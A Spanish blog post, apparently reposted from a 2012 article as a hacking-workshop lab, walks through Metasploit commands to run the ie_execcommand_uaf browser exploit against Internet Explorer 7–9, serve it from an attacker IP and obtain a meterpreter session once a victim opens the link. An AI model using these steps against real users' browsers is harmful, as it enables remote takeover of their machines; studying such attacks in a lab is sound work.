Explotando IE 8


Este 0-Day lleva bastante tiempo publicado y es una falla que afecta a las versiones de Internet Explorer (7, 8 y 9 ) en sus distintas versiones de Windows. De tal manera realizaremos un taller tomando esta vulnerabilidad de IE y la exploraremos con Metasploit, así entenderemos como funciona un exploit y los peligros que una falla de seguridad conlleva.

Antes de comenzar aclarare que la entrada original fue publicada en el blog de 0verl0ad.com en 2012 y me he tomado la libertad de publicarla sin tomar crédito de aquello, solo preparo los cimientos para la construcción de un taller de hacking,  virtualizando algunas maquinas y poder estudiar el asunto mencionado.

0-day en IE y Metasploit, al ataque!!

Hace unos días aparecía una vulnerabilidad (un 0day) que afecta a diferentes versiones de Internet Explorer (IE 7, 8 y 9) y a las diversas versiones del sistema operativo de Microsoft que lo utilizan (Windows XP, Windows Vista y Windows 7). Hoy leyendo mis RSS leo en Flu-Project que Metasploit ya lo tiene implementado, así que vamos a ver como utilizarlo 😀
Lo primero, SIEMPRE, antes de utilizar Metasploit, hay que actualizarlo, para ello:

msfupdate

una vez este al día lo iniciamos con:

msfconsole

y veremos su bonita presentación (son geniales los banners de metasploit xD):

 

Lo siguiente es seleccionar el exploit a utilizar, para ello:

use exploit/windows/browser/ie_execcommand_uaf

Siempre que vamos a ejecutar un exploit o cualquier funcionalidad que ofrece metasploit, es recomendable el comando info que nos mostrara informacion del mismo:

info

En este caso vemos que el exploit funciona sobre:

  • IE7 en Windows XP SP3
  • IE8 en Windows XP SP3
  • IE7 en Windows Vista
  • IE8 en Windows Vista
  • IE8 en Windows 7
  • IE9 en Windows 7

 Las pruebas las se han realizado sobre un Windows 7 con IE 8, pero teóricamente soporta todas esas versiones y SO.

El siguiente paso es especificar la IP del servidor donde se preparará el exploit, es decir, nuestra IP, para ello:

set SRVHOST <IP>

en el ejemplo:

set SRVHOST 192.168.0.111

y por último lanzar el exploit:

exploit

Con esto el servidor se quedará en espera de conexiones, entonces, cuando la víctima acceda a la dirección que nos mostrará Metasploit (campo Using URL), se lanzará el exploit 😀

 

Al final de todo el proceso, sino ha habido ningún problema, tendremos una sesión de meterpreter:

sessions -l

Listo, ya está todo el proceso, y al ser una vulnerabilidad 0day todavía no está corregida aumentando su peligrosidad.

Si queréis más información, aquí tenéis una entrada del blog de rapid7 => https://community.rapid7.com/community/metasploit/blog/2012/09/17/lets-start-the-week-with-a-new-internet-explorer-0-day-in-metasploit

Nos leemos en breve 😉

Anuncios

Una respuesta a “Explotando IE 8

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s